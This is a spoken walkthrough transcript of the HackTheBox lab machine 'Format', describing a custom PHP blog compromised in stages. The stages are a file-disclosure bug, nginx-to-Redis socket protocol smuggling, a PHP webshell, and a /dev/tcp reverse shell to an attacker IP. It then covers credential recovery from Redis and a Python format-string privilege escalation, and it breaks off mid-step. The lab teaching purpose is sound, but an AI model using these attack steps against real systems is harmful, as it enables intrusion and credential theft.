What's going on YouTube? This is Ipsec. I'm doing format from HackTheBox, which involves a lot of source code analysis on a custom coded PHP app that's not using any framework, so it's a little bit confusing to understand what's going on. But essentially, there's a file disclosure vulnerability that lets you leak any file off the server so you can see how it's configured. And there's a file upload vulnerability, but you don't have write access anywhere to execute PHP scripts. So you can look at how nginx is configured and discover there is a protocol smuggling attack that you can use to get into the Redis database, which is what the web app is using. So you can get into the Redis database, change some parameters around your user, which causes the web app to create a new directory for you to upload the PHP shell, and you get user on the box. And then root is like a format string vulnerability within Python. I didn't know it existed until doing this box, which was really cool. So let's just go ahead and jump in. As always, we're going to start off with an nmap, so -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it format, and then the IP address of 10.10.11.213. This can take some time to run, so I've already ran it. Looking at the results, we have 3 ports open, the first one being SSH on port 22, and its banner tells us it's a Debian box. Then we have 2 HTTP servers, both running on nginx. There is no operating system leakage, and they are running on port 80 and port 3000. The one on port 3000 looks like it is redirecting us to microblog.htb, so let's add this into a host file. So sudo vi etc host, and then we can add 10.10.11.213 microblog.htb. So let's go over to a web browser and go to 10.10.11.213. And this one actually does redirect us to app.microblog.htb. I'm not sure exactly why the one on port 3000 was shown in nmap of redirecting us. If we look at it, we can see it did not follow it, but the one on port 80 doesn't have any of that. I'm guessing port 80 used some type of JavaScript redirect. We'll take a look at that in 1 second, but let me add app.microblog.htb to my host file. That's not it. Microblog, HTB, there we go. So I'm going to go ahead and make sure intercept is on, and we'll make sure we are sending a request to Burp Suite. And I'm going to refresh this because I want to see what happens if I get on this without any host name. And we do see it redirecting via, I guess this is HTML, not JavaScript. If we change this to be port 3000, let's see exactly how this redirects us. We just have it in the HTTP header. So the nmap script is not actually looking at the body, it's only looking at the headers, and that's why we don't see the redirect to app.microblog.htb from the nmap scan. That makes total sense. So I'm going to turn Burp Suite off for a minute just so we can go browse the websites. So microblog.htb, port 3000, and then we go to app.microblog.htb on port 80. We have a gitea instance, which is just like GitLab or GitHub. It's just a self-hosted Git repository. And there is a project called Microblog. So let us, let's see, can we clone this easily? I think if we just do git clone, like this, there we go. And we can go in there, do a git log, and see if there's anything that sounds dangerous. It looks like it's just standard. I don't see like removing passwords or anything like that. If I get into a huge pattern where I'm stuck, I may go check out these previous commits, but I don't think that's going to be the case. So let's go look at the actual website. We could start out looking at the source code, but whenever I can see what a website is doing, I prefer to know that before looking at source code because it's nice to know what I'm looking at. So if we have a link, loving microblog, contribute here. And I think this is just going to, the gitea service that we have already downloaded. We have a login form and a register. I'm not going to bother testing for SQL injection and all those things because I think I have the source code. So let's just do username, password, and login to see exactly what this is. And we have a dashboard. If we do myawesomeblog.microblog.htb, let's just do ipsec, create. We created this. we can visit the site, but we need to add the host name. So again, sudo vi etc host, and then we can add ipsec.microblog.htb. Refresh this. We have just a page. If I go to edit the site, we have h1. I'm going to put h1, I guess, or we can put header and do post. And then text, I'm going to do please subscribe. Click post. And now if we refresh our site, we can see the header and some text. So the very first thing I search for is like SSTI in this. So Cobalt has a really good SSTI payload on the website. I should just save this to my computer, but I really like this because it tests a bunch of various frameworks at the same time. So I generally put this and then a string afterwards. And if it does not error, I assume it's not vulnerable to SSTI. And since we see both of these, I'm guessing it is not. The other thing I like testing for is XSS. And I generally just start out first, try and put something in bold. And I see please subscribe is in bold. So I know this is probably going to be cross-site scriptable. Let's add an image source is equal to HTTP 10.10.14.8 port 8000. And I'm just going to say XSS. And let's start up a web server, Python 3-m, HTTP server, post it. And we have a request. So if anyone hits our microblog, we'll see the request in this. We know it won't come from 10.10.14.8. And we know we'll have to go with cross-site scripting. But I don't know if anyone's hitting this, so I'm not even going to bother testing more for cross-site scripting until I can confirm that. So let's see exactly how this edit piece is working. And I know we could go and look at the source code, but I'd rather do it this way. So we're going to do test, send it over. And we have two parameters, this ID and this text. So let's see. I'm going to actually look at the source code now because I don't know exactly what ID and text is doing. This is probably going into a database, but ID has utterly confused me. I'm sure we could figure out if we go busted, but why run go buster when we have access to source code? So let's go in microblog. And then let's see, we have a few directories. If I do ls html, that probably is the static nginx thing that is just redirecting us. ls microblog, we have app and Sunny. So if we go cd app, this looks like some source. Let's go cd ... microblog Sunny. This looks like an actual page. ls content. So if we go in content, we have order.txt, a few strings, and these are file names. So if I cat this, it looks like just HTML. And I'm noticing there is an app and Sunny subdomain. There is an app subdomain. I'm going to test for Sunny real quick. So let's do v etc host, password, and I'm going to add sunny.microblog.htb. And let's navigate there. And I know I said I was going to look at the source code, and then I got distracted as I was opening up Visual Studio Code. These are just the rabbit holes you generally go down. And it looks like we have someone using this website. This is the header text. This is the text. And based upon this, I can kind of guess what is happening now. That random string of text was going into a file. Like if I go back to my Burp Suite window, we can close these real quick. We have this, which is a random string, and then text. I'm guessing the h1, we pass the h1 parameter here. So what I want to do is go back to my microblog, and we have two things, and it was storing something in content, right? If we go back here, it was sunny content, then order.txt. So if I look at order.txt, save the file, open it, we can see 3 files. So if I grab this one and paste it, this is annoying how it always does the file save window. I guess I should do this in Burp Suite. We see the line. So based upon this, it looks like we control the file name we're writing. So I'm going to do hello.html, and we'll say ipsec was here. Okay, so let's go content, hello HTML, and it does go to download it. Let's send another request real quick. Was change request method. This is a get now. Let's do get content hello.txt. Hello.html is the file I used. Content. There we go. So what I want to do is, we'll call this file create. Try a PHP script. So we'll do hello.php, and we can say php info, like that, and send it. And then we called it hello.php, right? Yep. So do hello.php. And unfortunately, it is not executing it. So nginx must not be forwarding PHP inside of content to probably fast CGI is what it's using. That's just generally how nginx executes PHP. So at this point, I want to go look for like a file disclosure, or I guess we could see if we could write to a different directory. If we could go up one, so /hello.php, and instead of content, just delete this, and we get file not found. And if we didn't end this in PHP, we have a 404 not found. So at this point, we do know that nginx is doing some weird rewrite rules, because extensions go to a 404, like this that you're seeing with HTML. If we end it in PHP, it's a file not found. So if I went to content/does-not-exist.php, we see the 404. So by this, we know it's not sending it over to the fast CGI processor, because PHP scripts didn't exist inside of content and they got executed. That's how the microblog service was working, right? And when we do that, we get a different error message. So from that conclusion, we know we probably have to escape the nginx site parameter or location. We could try something like this, content like that, or something crazy, but hold on. It was hello.php, right? I've seen things like this occasionally work, like one time out of my whole life I've seen that work. But now it's time to look for the source code, because we kind of understand the app. So this one that I have open is, let's see what this was. This is probably, I want to say the app. It is. And we could also run a virtual host enumeration to see if there's any other clients than me and Sunny right now. But I'm not going to do that. I want to just look at the source code before I keep getting distracted. If I was doing this for the very first time, I probably would go down that rabbit hole, because it only takes like a minute to set that up, right? So I'm just opening the applications that I see. So we had app and microblog. So we have the login function, so we can see exactly how login works to test for like SQL injection. And it's actually not using a SQL database. It's using a Redis, which is like a caching engine, which is a bit odd, I think. It's connecting, it's doing a hget, username, compare, yeah. So instead of searching through all this code, I'm going to send it over to Sneak real quick. We will rerun this and see if it finds any vulnerabilities. Dashboard has 2. This is cross-site scripting. This is potentially a command injection vulnerability. So let's take a look here. It is running system on tempdir. How is it creating tempdir? I think this is just a PHP thing. Oh, we got site name here. How is site name grabbed? Add site, site name. Let's see. Let's do a find in files, site name, function if, is this setting it? Username sites. I'm not exactly sure how it is pulling that. But let's see what other vulnerabilities are here. HTTP header, cross-site scripting. And this is another cross-site scripting. So let's take a look at the other application. Go over to Sneak, look at it. We have more headers flowing into system. And this is blog name. And this time I can easily see blog names here. So if we go to get blog name, it's getting it off the HTTP host of the server. I don't think we can really exploit that if we send it a different HTTP host. It's probably not going to pass all the virtual hosts from nginx. So I'm going to move on to see what else there is. HTTP header. Oh, this is all the same thing. Let's see, PHP self. Seems to be a lot in this. If we minimize all these, I can make this bigger. Wow. We have a file get contents. So this is going to be potentially a file disclosure. So let's see what this is. So this is deleting items. And I really hate PHP that is coded this way. So we don't really have a router file. We just have a bunch of PHP code. And then it's essentially like an if-then to see what's happening. So if we hit edit/index.php with the post action and post ID, it's going to go down this field. Add header. Don't know what that is doing. Add text. Oh, header is probably that H1 field, right? So this is the text field, and this is the H1 because we can see post header ID, post text ID. So I'm guessing this is how we're adding data to a site. So if post text is set and post ID is set, if I look at my burp suite and go to file create, we have ID and text. So this is the code path we're down. We're going to switch to the content directory and then run this nl2br, which inserts HTML line breaks before all new lines on post.txt. So that's this. So any line break, I think it replaces with the HTML line break. Then it creates this HTML file. That's why when we viewed the content, we saw the PHP info between div tags. So that's what that piece is doing. Then we do a file open on the ID. So it's doing file open here. So it opens a handle and then writes the HTML into that file and then closes it. And then it's going to open order.txt in append mode and write that ID into order.txt and then close it. So one of the things I think my mind is wrapping around whenever I see order.txt, I'm thinking they were like buying a service. This is just the order each HTML content gets displayed. But we have a file disclosure vulnerability right here because it opens the file for write mode and then takes what's in HTML and puts it there. And what's in HTML gets created by this text parameter. So I wonder if we can do, actually, hold on. Insert add text, add header. Let's see if we do, let's just try, I'm going to write the test. And then let's just do etc pass wd and text, see what happens here. And we called the file test. So we just wrote etc pass wd. If we change the ID, so we added text. We do etc pass wd here. Do test. Okay, I think I know what it's calling out. So we have this order.txt, right? This is confusing how it works. So we didn't actually just write etc pass wd in this content directory. What we did was put etc pass wd in order.txt. So when we view the page and it goes to download each of these files, it's going to hopefully download etc pass wd, right? So let's go back to my blog. 404 not found. Did something revert? Microblog.htb. Let's go, I guess have to register again. That's annoying. Okay, create ipsec. There we go. If we visit site, does my site still exist? It does not. So I'm going to send this to Burp Suite. Text, test, intercept on. And I'm doing a new one just because I probably have a new cookie or something, right? So if we go back here, we see order.txt just has one file. And that file is going to be the test. So if I now create this and then go grab order.txt, we have etc pass wd. So I'm guessing we will see test at the top and then the pass wd next. So let's go and turn Burp Suite off, hit enter, and there we go. We do see test, and then we see this etc pass wd. So what we probably want to do now is automate this in Python so we can grab files a bit quicker. Because if we just keep doing this manually, we're probably not going to grab as many files as we want because we're lazy, and grabbing a file takes like 20 seconds when it should be instantaneous, right? So I'm going to call this, I guess, file disclosure.py. And I should not do it in Vim. Let's do it in Visual Studio Code. And now that that's open, close this out. The Explorer window, why is it in this? I'm just going to close all my Visual Studios out. Okay. Code here. And let us begin. The first module I need, obviously, is going to be the request module because we're going to be making HTTP requests, right? So I'm actually going to create a new blog each time. I could go with like adding this, then deleting the post, then adding a new post. But I'm going to create a new one each time because it looked like everything was on like Redis, which even like the username was temporary, right? I had to create a new user in the middle of looking at all this. So I'm just going to have my script create a random user, upload the stuff to get a file, read the file, and then that user's pretty much dead. So let's just do file disclosure, username, ipsec password. And all I'm doing right now is looking at the request that is going to create a user. So we intercept this, and this is what we need to send. So we make a post request to index.php and send this. Okay. And since I want a random string here, we also have to create that now. So I'm going to import string, and I'm also going to import secret and just do a one-liner. So I'll call this username is equal to join secrets choice. And what this is going to do is just get me a random string, right? So string ASCII. And it looks like Copilot already knows what I want to do. I'm going to remove digits just because I don't think we need them. I'm not like looking for the largest key space of things. I'm not even positive it accepted digits, right? We've only tested with ipsec, which is a string. So we have that. We can now print username if we want and make sure this does what we think it does. So it's running and we get a random string. So that works. The next piece we need to do is going to be create our session. So we can do session is equal to request.session, and we can do session.post, and this is the data we want to send. So let's copy this. I'm going to say body is equal to this, but we need to convert this probably to JSON would be the easiest, or a dictionary, I should just say. So like this. So first name, was it first name? Oh, because I did file disclosure. I'll just set everything to the username. The first name and last name I do not think matter. Then username. That. Password is equal to. We'll do the username as well. But the main key thing is we just are registering a user with this name. Instead of this, I'm just going to do first, last, password 123. So maybe that makes more sense if I don't use username repeatedly. So now we can do a session post, and we need to send it to HTTP. What was it? app.microblog.htb / register index.php. Data is equal to body. Okay. And I'm actually going to set this to a proxy. There we go. I just want to see the very first request it makes. So refresh this. We can run. Dict object is not callable. Let's see. Session proxies. I thought that's how we did it. Set session to use Burt proxy. That's not it. Let's see. Session.proxies. Oh, there's probably a set. Update. That's what it is. We did not call update. There we go. That should do it. It's thinking. I don't know what that's getting. and I just ignored it. Sent, and it looks like it is working. So we're sending this post. If we look at it, we have a successful, and it already sets a cookie for us. So I don't think we even have to bother with a login. So let us now move to the next step. And that would be creating the site. User already exists. So let me log in. So let's do an example here. Create site. And now we need to send a post to dashboardindex.php with new blog name site. So let's do is equal to new blog name. And we can name it our username. It has to be random data because if we didn't, then our users would be colliding. I'm guessing you can't have two blog names with the same username or same like subdomain. So that is why we did that. Okay. And then this could be the tough part. I wonder if we're going to have to end up getting our username from here. Because if we do, then we have to modify the host file as well each time. Because this is going to create a random string.microblog.htb. So let's play with this and see exactly how this works. So once we create the site, let's forward it. Oh, come on. Did it log me out? This is why we're creating a user each time, because this is annoying. So we create the site. Then we edit. So this is where we want to put the LFI. Or not LFI, file disclosure. It's only LFI if there's like an include statement to execute code. It's a bad habit I'm trying to break myself off of calling all file disclosures LFIs. Just put it here. Intercept this request. And this is what we want to send. So body. And the ID is going to be the file name we want to leak. So I can say if sys.argv1. How am I going to do this? Sys.argv. Let's do length of this does not equal 2. Then file name is equal to etc passwd. Else. That should be fine. So ID is going to be file name. And text will be please subscribe, because this really doesn't matter. Okay, if we post this, this goes to edit index.php. And we didn't update that one. HTTP history. Let's see, where was the post? Is it dashboard index.php? There we go. We can leave comments. Okay. So let's go back to Burp Suite, intercept. So when we send this, what does it send us back? Action edit. A 302 found. Oh, we did not put Etsy pass WD here. Oh, sweet. So the response of this, it is a 302 found, but it actually contains the data we want right here. So we don't even have to modify Etsy host to get all the host names. We need to, though, tell this to allow redirects to false because we don't want it to follow this 302 redirect. And then we want to grab this. So we want to grab everything after file disclosure. Let's see. How many times does this exist? Twice. But one is because I made the mistake. So in the new account, it's not going to have this. So we want to grab everything after this. So we need to create a regular expression. Let's see. So we'll have something like this, and then we'll have data, and after pass WD, where does this data end? Bin false. We're going to grab everything up to this. That was a weird paste. Okay. So we can grab this. And instead of trying to write a regex by hand, I'm just going to go to GitHub Copilot and ask it. So I want to create a regex that grabs data. Data can be anything. Here's in. Let's see if it understands what I want. There we go. And it even gives me an example of how to use it. So let's try this out. Let's import RE. So we're doing a session post. I want to grab the request. And let's see. It's r.content, I believe. Sweet. So we can say the pattern is going to be that. We match against r.content. Data. Print data. Let's run the script. And I probably have to turn Burp Suite off because we are proxying. A string pattern on a bytes-like object. Let's see. Pattern was a regular expression. So I wonder if this has to be a string. I probably want to decode it, actually. Let's just set a breakpoint, and this is why I like doing this in VS Code. So I can say r.content real quick. So that is encoded. If I do decode, it looks fine. Let's step over this and see if we error. We don't anymore. And it doesn't have a match. R.content 404 not found. So we screwed something up. Data body. Let's turn Burp Suite on. Then run this. And we're going to look at each request. So here we go. We are registering for index.php. I'm going to, I just forwarded, I guess. So it gets this afterwards. Registration successful. Now we're going to create a new blog, and I want to do intercept response to this. 302 found. So I think it created this blog for us. Okay. Now we're going to do, why do I have a space there? Because I have a space in the code. That's probably going to be the error. And that's the not found. Okay. That was silly. We still have none. r.content, file not found. What was file name? Etsy passwd. Text was please subscribe. Let's see. We do text test. Let me just make sure I have this correct. Does a post. Oh, it probably has to set the host header. Because we're sending it to app.microblog.htb, and we want to set it to a token. So that is what the issue is most likely. So let's go over here, and we can add that header. I'm just going to do it in a new line so we don't have to keep scrolling. We can say headers is equal to, and then host fstring username.microblog.htb. There we go. Microblog's unknown word. That is fine. Okay. So let's do this now. Turn intercept off. Turn it on. Run the script. So we register the user. We have the cookie. It's going to do that. We create the new blog. And this time we are editing. And we have set the host header to be this. So let's intercept the response to this request real quick. That looks good. And let's see. I'm actually going to go back to the code. I'm going to set a breakpoint there for the request. And I want to see what match.group1 looks like. That looks good. So if I just continue, then we go to the terminal, we have our file. So the only thing I think I need to do is, let's see, there may be like a decode or something. I'm going to comment out my proxy so it goes a little bit quicker. And let's run Python 3 on file disclosure.py. Yeah, we want to make line breaks, actual line breaks. So let's say print data.replace. We're escaping a slash, so that's why it's \n. So replacing the line break or the \n with an actual line break. And see if that works. There we go. So this is going to be the passwd file. And now if we give it an argument, so I'm going to give it Etsy hostname. Let's see, we got format. So now we can start playing with the file disclosure. Now, there was one thing we did before. We had file write inside of content, but we couldn't execute code. So I want to look at the nginx configuration. So do etc nginx sites enabled default. And let's see. I wonder if there's a better way to do this, because I don't feel like escaping now \t and replacing it. Let's see. Wonder if I set a breakpoint there, run it, and I actually don't know if Copilot Chat can see the current state of the program. Want data to process all special characters. Right now it will display things like instead of putting a tab. Now I'm really curious if this does it. To replace characters with their corresponding, you can use Python built-in. So string.escape. Let's see, decode a string with. Let's try this. So we'll decode data. Import codex. Okay. Rerun it. Unknown encoding. String escape. So it looks like this AI has the same thing as others. So I'm guessing it was using Python 2. Bytes, data, UTF-8. Let's see if this works. Rerun it. It looks like that may have done it. It did. Sweet. So now if I run this again, it is processed as I want it. So let's see. I'm going to make dir output. I'm going to write this to output nginx default. So we can see how it's configured. I'm guessing it doesn't actually have those escapes. Maybe it does. That looks a bit odd to me. Let's just replace that. Dot replace. How is that looking? So we escape the backslash like that. What is that erroring on? I did double parentheses there. There we go. Let's try running this. That looks more readable to me. Okay. So this isn't exactly what I wanted, but this piece is going to come in really handy in a couple minutes. I I say it's not exactly what I wanted because this isn't explaining how PHP code gets executed. So if I play around with this, so we have sites enabled. Let's do microblog. .conf maybe. Let's see. What could the site name be? app.microblog.conf. Do I have nginx installed here? Sites enabled is default. Maybe it's .htb. Microblog.htb. There we go. This is what I wanted. So let's do helper nginx microblog. We can go into output. If I cat it, I'm going to hide everything that has a comment. And then grep period to show me every, or get rid of empty lines. And we can see right here exactly what is happening. So in nginx, you can only match one location at a time. Like if I just match this content and it goes down here, it's not going to keep going down the file and then match the following PHP. And it goes with whichever one is the most strict or like has the most match. So I think the content, when we put a PHP file in here, it's matching both the directory and part of the extension, right? So that is why it's jumping to this. If it only matched the directory, maybe this PHP one would trigger. I'm not exactly sure, but this is why we can't just drop a file in content. This does mean, though, if we can create a file anywhere else, we can get code execution. So when I was looking at this, I did notice there was a /edit directory. And we can try dropping a file in edit. So we probably have to re-log in. Nope, doesn't look like we do. So let's just do test real quick and intercept this. And we can say edit /ipsec.txt and see if we can write it here. Actually, this definitely won't work because it's writing right now to content. So we have to go up one directory, then to edit, and then ipsec.txt. And this is assuming we can specify if we can do directory traversal in the file write, right? Because a while ago, we've verified whenever we wrote like this, it would write ipsec.txt inside of the content directory. So that's why I'm trying this. So let's go back, turn burp suite off. We can say edit ipsec.txt. And we get a 404 not found. So we can't write to that directory. So we need to find a directory we can write to. And that's where I go back to the source code. So let's go back. Let's see. I want to go cd ... Let's go to microblog. Template, open code here. And is there any other directories? We just see content. Oh, there was images. So we could also try writing to images. So we can change this. Images, ipsec.txt. Go here. Images. And not found. So let's go here. Let's see. Check owner. So there is this bulletproof. I don't know exactly what this is. It does show a uploads path though. So can we get uploads? Does that exist in a directory? 404 not found. If we did images, I think it's a 403, forbidden. So we need to figure out how to get uploads created. Because if we do, then we can just write our script in there. So I'm going to change the project. I was looking at the microblog template, which is like how we modify the site. and go to, I think, just microblog. It's either microblog or microbucket. So if we do code dot, let's see. We want to see what happens when we create the site. And let's see, the parameter we use to create a site is new blog name. So this is probably around where we want to look at. Log in, log out, register. Okay. Find in files, new blog name. Add site. Is there any uploads here? There is not. So that's probably what I should have started with. Let's just grep-r uploads. And let's see. Sunny has, that's microblog. There's microbucket. Blog name. Oh, right here. There is a makedir blog name uploads. We got to figure out exactly how that works. And that was in microblog template. I'm not sure why I missed it before, but let's look at this. I hate all this like unstructured PHP code. It is mind-boggling to keep track of. Find in files. Uploads. Okay, deleting out of uploads. What is this doing? We got a provision pro user. So if the user is a pro user, then it's going to make microblog writable, copy bulletproof here, and also looks like it creates uploads. So we need to figure out exactly how to do provision pro user. Check user. So what is a pro user? Is pro in this? There is a function is pro. So if username, it's going to go to the Redis socket and it's going to do a get on the username pro and return if it is pro. So let's see exactly where is pro is called. That's the function. Const is pro. Let's see. So it is writing to this socket. Let's see, is there this? So this is where we're registering a user. Again, I really wish there was like a route file that just said like, here's the registration endpoint and here's the code. We just got to guess based upon all the parameters, but invalid first name, invalid last name. Here we go. So this is what happens when we create a user. It's going to connect to this socket. It's going to check if the username exists by doing a get. So that, well, doing an hget. So this is all like Redis technology. And then if the user doesn't exist, it's going to do hsets. So we'll do hset, the username, pro, and false. Now, the vulnerability comes in with nginx, how it's configured. So if we go over to our output and go nginx default, we have this right here. And what this is going to allow us to do is write to a Unix socket, because if we do HTTP and then Unix like this, then nginx is going to go to both of these sockets. It's part of like the broadcast how it works. So you can specify multiple wrappers here, and then we can specify the file, right? So what we want to do is, let's see, I'm trying to think of a good way to show this. So if we make the request to microblog.htb/static/ipsec, then what this proxy pass gets turned into is going to be this. And then we could do /abc, and it's going to grab this. Um, I believe the reason why it's doing this is so you can include things like /css file.txt, and the website's going to think or behave like the browser's going to behave like it's grabbing the CSS off microblog.htb. But really, when it goes to nginx or whatever like load balancer you have, the request is going to be this css.microbucket. So it lets you send that CSS request to a completely different server. So let's go back into this socket discussion. So we send it to socket unix : / and then we're going to, let's see, where is the socket? So we can send it like this. And then after we specify the socket, what we want to do is put a colon and then our username pro true. And what this is going to do is, number one, be really confusing. But if we made a GET request, it would connect to that socket and then send get ipsec pro true. And it would send this to that socket, this string. So it's kind of like a protocol smuggling attack. And if we look at this, it's doing hset, and we want to change it from a get to be hset, and we set our name to be or do a set for a username and make it true. So that is the attack we are essentially doing. Let's see. Is it like hacking middleware nginx Redis? Trying to find a blog post. If you go here, you can read a lot more about it. This is a good post that OXDF had found that explains the attack and everything that's going on. So I would recommend reading that if you want to know more or you're not really fully understanding what is going on. So let us go now to Burp Suite. And we're going to send a request to microblog.8, the app. So we can send a repeater. Then we want to delete everything but the host line. Make sure you have 2 line breaks here. And we want to send a hset request because that is what the app was doing to modify Redis. And then again, we do static, so we get into that nginx thing. And then what was it? var run redis.sock. I want to say it was running under var run redis.sock. Always should copy and paste file names. Like that. Okay. Then we can do a colon ipsec pro true. And I think that's all we do. So I'm going to highlight this, URL encode it. We're going to refresh our page, send it. And we got a 404 not found. We did not hit that location header. Maybe it's just microblog.htb. You want to see a bad gateway because you're sending something that just doesn't return. Refresh. And I was expecting to see something saying we are pro. Can we get, let's see, close all these windows, visit site. We have this. Is there an uploads directory? There is not. So I do not think we are pro. Let's see. Static Unix. I wonder if we only do 1/. That's not it. Oh, I think we need to terminate with like a slash because the nginx thing had static something / something. So let's add a /a. So since we didn't have both parameters, I don't think we fully triggered it. That doesn't look good. So I wonder if we want %20 instead of plus. There we go. So pluses did not do it. %20 did. The whole URL is weird. I always thought pluses were synonymous to %20, which was synonymous to space, but that's not the case, as you can see. But we are now pro. Hey, this is Ip from the future. I want to go a little bit into the whole plus versus %20 thing, at least was part of the domain or folders and not a parameter. I'm not 100% sure if this is accurate. I just wanted to look at the behavior, so this is at least how nginx is doing it. And it's also happened in a few other videos where plus didn't work, but %20 did. So if I look, I am in var run Redis, and Redis is listening to the socket file. So I'm going to move it. So we'll move redis.sock to redis.orig, or we can do .sock.orig. And now we can create our own pipe here. And if I look at Netcat's help, it does have Unix socket supports. If we look here, utility for anything under the sun, TCP, UDP, or Unix domain sockets. So we don't have to actually listen on ports. We can listen on socket files. So if we look, it is a -U to listen on a socket. I don't know what -F and X is. What is -X? It looks like it is alphabetical. So X uses proxies, -F uses something I don't want to read right now. But we can do a nc-U redis.sock. And, oh, we didn't use listen. So we can do lu to listen on Redis sock. And then we send this HTTP request back over, and we did not see it. lsla redis.sock. Oh, only root and Redis can access the socket. We want to make it so data can too. So I'm just going to chmod 777 it. And then let's run our netcat command again. Still can't. It probably creates this file upon initiating. So I'm going to do Control Z to background it. Chmod 777 redis.sock fg enter to foreground. Then we can run it. It hangs because we completely broke this pipe. We're never sending data back, so the web server just hangs. And we see there are spaces because we do have %20s. Oddly enough, we did HTTP 1.1 and it got 1.0. Maybe that's nginx creating that. So what we now want to do is create a new socket, chmod 777, then fg enter, and I'm going to change this to be a plus, and then hit enter. We have to cancel out, hit enter, and we can see the plus did not get decoded. So when it's part of the domain, or at least how it's configured in nginx, it's not going to URL decode that. And I think that's because like domain names, maybe they can include pluses and stuff. So it's not a true URL decode on this piece. The parameters are URL decoded. So when it was a parameter, that's when the plus would get transferred. But %20 does not. So hopefully that clears things up on why we needed to make it into %20s. So let's get back to the box where we now have an uploads directory. If we go to /uploads, it's still 404. Is it upload? Okay. So if we are pro, let's see. Is there anything that says pro in the template? How do we provision pro user? I'm guessing we have to browse the blog, maybe? It is uploads, right? Uploads, it is. So if we do ipsec HTTP like that, we have the blog. Did uploads magically get created? It didn't. That is confusing me. Let's just try writing to uploads and see if magically it gets created. If not, then we have to figure out exactly what happens to create it. Oh, we have image. So I'm guessing we may have to upload a PNG image. Let's see. Locate -r star.png. Locate.png. There we go. Sure, let's do xanadu.png. I have no clue what image this is. Let's see, ipsec, HTB. This is format, xanadu.png. Upload. We have now uploaded an image. So by that logic, we should have a uploads directory. 4.3 forbidden. That is what we want to see. So now we can go to text and put something here to write a file. Let's make sure we're intercepting in Burp Suite. Post. We did not intercept here. Okay. So now we want to do a .. to escape content, and then go uploads shell.php, and we can say php info, like that. Uploads shell.php. We are intercepting. There we go. Now we finally have code execution. So let's do system command request cmd. And if we do question mark, we did lowercase cmd equals who am I? I thought that would return. Is it lowercase? Does that matter? There we go. I had this command wrong. So now we have dub data. So let's intercept this request and get a reverse shell. And I always like putting the shell in the post parameter just because there's less bad characters. Dev TCP 10.10.14.8 9001 0 and 1 like that. NC LVNP. Let's just do it in a new pane. URL code. And we have a shell. So let's do Python 3, import pty, pty spawn, bin bash, stty raw, minus echo, foreground, enter, export term is equal to x term, so we can clear the screen. And the first thing I always do once I pop a web server is exfil the database. This time we're not using MySQL, Postgres, or anything like that. It's using Redis as the database. So I'm going to do Redis CLI to see if it exists. Let's do a which. It looks like it does. So we can do Redis CLI-s for the socket, then var run redis.sock. And then we can do key star, and that's going to list every single key. So if we did a hget key and then field, so hget ipsec pro, that's going to return true because we are pro. This is like the hget and hset command, right? If I just do help, let's see. It says help and tab. We can get a list of things. If I just do help command, I don't know how to list all the commands of Redis, but there is a hget all command. And if we do hget all on ipsec, it's going to dump everything about me. And you can see, let's see, username ipsec, password, first name ipsec, last name ipsec. Pro is true. And I think that's because of my like protocol smuggling of that hsec command in my HTTP. That was, let's see, this, right? We did /a, and then it also put this. So one of the things I guess I did not mention, if we do hset ipsec pro false, and now we get all, we get pro is false, and then we had junk here, but it's still set. Oh, let's do the junk and make sure pro is set to true. You may think like the command would error because we gave it more arguments than it expected, but all it did was append them to the bottom of this and did set the pro key to true. So that is also a piece why that worked. I'm going to do a hget all on cooper.duper because that's just another user that runs the site. And we can see his username, his password. He is not pro, but we do have a credential here. And if we had looked at Etsy passwd more, if we just grab everything that ends in sh, I think I put that in quotes, we can see Cooper is a user. So I'm going to do an su-cooper, put in this password, and we can log in. I'm going to get off my reverse shell now just because SSH is a bit better. So let's see, I think it was 212. Was that the IP address? No, it's 213. Paste in the password, and we can log in. So now that we are Cooper, we can try like a sudo-l because we have his credential, and we can run this license binary as root. So chances are this is going to be Howie Privesc because, well, that makes sense. Cooper can run this binary as root. So let's take a look at the license file. So if we do a file against it, we can see it's just a Python script. So let's open it up. Right away, it's creating a license class, which just makes an object. We have it making sure we are running this as root. And of course, we can run it with sudo. So we will be running as root. Now we have argparse. There are three options. We can provision, deprovision, or check a license. Then it's going to connect to the Redis socket. So var run redis, redis.sock. And looks like it's going to pull a line out of root license secret. And that's going to be a secret used for encryption. So that's probably going to be how it like signs or creates the license. Then we have, I don't know what for net that's doing, but here we're creating the license object. And on the provision, we are going to look if a key has been provisioned already. If not, we're going to generate a license key. And there is a Python format string vulnerability here because this is user input here. And the whole format is not really, it's not as safe as using fstring. I bet if we go to GitHub, fstring vs format Python, let's see, do we have something? And I don't mean to do GitHub. Let's just do fstring vs format Python. There's a LinkedIn article. I can't find the exact doc I wanted. Secure, safer. Let's add that. Was it on Stack Exchange I saw? I'm not exactly sure the argument or the article. Wait, was this it? I think this article shows it well, but I have to log in to read the rest of this story. So I can probably just do a demo, I guess, real quick. So let's do vtest.py. I'm going to import sys, and we can say output is equal to sys.argv1 or argv1 one like that, and print output. Let me just make sure this works. Okay, so that's working as expected. So I can do dot format. And when I run this, nothing changes here. But if I put this between brackets, we can see it errors on a key. It's kind of like a server-side template injection, right? So I'm going to say secret is equal to please subscribe. And I'm going to pass the secret into this format. So if I just run this with IPSEC, we get IPSEC. If I run it with that ASD thing again, it errors because it doesn't know what the ASD key is. But if I run it with secret, it says please subscribe. So that is the vulnerability in play here. It took a while to learn that, figure out I wanted to leak the secret key it uses to create licenses, but that is it. If you don't know the F string, I haven't used the format command in a long time in Python because now you just do output is equal to F and then sys.argv1 like that. And we can rerun the same thing. So forgot to close this squiggly bracket out. And you can see it's no longer treating that as a variable or a key. So what we want to do is poison any of this data probably. So it's going to print out the license key. So if we poison the first name with a variable, it will print out the license key and it'll be the data we want, I guess. So let us open up Redis again. So I'm going to do Redis CLI socket var run redis.sock. We can do key star. I no longer have an IPSEC key. I'm going to go to the site and create one. So we can do microblog.htb. Was it app.microblog.htb? It was. Let's create a user. So IPSEC. Okay. So now we have IPSEC. And we can do an hget all on IPSEC. And I want to change my first name. So I can do hset IPSEC first dash name is equal to anything I want. So this could be please subscribe. And now when I run a hget all, the first name is set to that. So we want to extract the secret. So I should go back to that code. Let's see. Cooper's password is here. SSH Cooper at 10.10.11.213. Vim user bin license. So it's passing in L, and L was the license object. And that's just this object. So we want to go into globals because the secret is defined outside of a function. So if it's defined outside of a function, it's going to be a global variable, I believe, in Python. I could be wrong there, but that is the logic I think we're going to go about. So we do license because it was license is equal to L. So the license is the variable, and then init. Then we can go into the globals, and I think we could just do this and it's going to output every global variable. Why don't we just try this real quick? So we set that, and now it's set. So if I do sudo user bin license dash p, I think we need IPSEC after that. Let's grab this. Expected one argument, so we'll do IPSEC. We have encrypted license key. And then we 